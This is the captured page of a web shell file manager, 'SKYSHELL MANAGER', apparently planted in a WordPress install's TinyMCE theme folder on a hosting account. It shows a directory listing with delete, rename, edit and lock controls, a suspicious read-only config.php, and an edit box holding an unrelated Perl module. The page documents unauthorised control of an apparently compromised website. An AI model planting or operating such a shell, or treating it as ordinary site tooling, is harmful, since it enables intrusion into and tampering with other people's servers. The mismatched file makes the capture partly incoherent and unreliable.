📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
21765.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: Base.pm
package Perl6::Junction::Base; use strict; our $VERSION = '1.60000'; use overload( '==' => "num_eq", '!=' => "num_ne", '>=' => "num_ge", '>' => "num_gt", '<=' => "num_le", '<' => "num_lt", 'eq' => "str_eq", 'ne' => "str_ne", 'ge' => "str_ge", 'gt' => "str_gt", 'le' => "str_le", 'lt' => "str_lt", 'bool' => "bool", '""' => sub {shift}, ); sub new { my ( $class, @param ) = @_; return bless \@param, $class; } sub values { my $self = shift; return wantarray ? @$self : [ @$self ]; } 1;
Save